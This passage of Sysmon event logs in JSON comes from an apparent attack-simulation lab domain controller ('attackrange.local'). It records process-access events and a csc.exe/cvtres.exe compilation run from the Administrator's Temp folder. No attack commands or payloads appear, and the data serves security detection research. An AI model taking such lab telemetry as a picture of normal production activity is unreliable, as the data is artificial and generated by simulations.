C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.878\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001067260900}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.878","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001067260900}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5689,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.935\r\nProcessGuid: {41C8662E-20D8-5F25-0000-0010DD290900}\r\nProcessId: 4728\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESD27A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\CSCB42A2826663747E9A63D2E1D34998C5E.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001067260900}\r\nParentProcessId: 5076\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.935","ProcessGuid":"{41C8662E-20D8-5F25-0000-0010DD290900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESD27A.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\CSCB42A2826663747E9A63D2E1D34998C5E.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001067260900}","ParentProcessId":"5076","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline\"","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5690,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001067260900}\r\nSourceProcessId: 5076\r\nSourceThreadId: 2788\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010DD290900}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001067260900}","SourceProcessId":"5076","SourceThreadId":"2788","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010DD290900}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5691,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-0010DD290900}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-0010DD290900}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5692,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5693,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5694,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 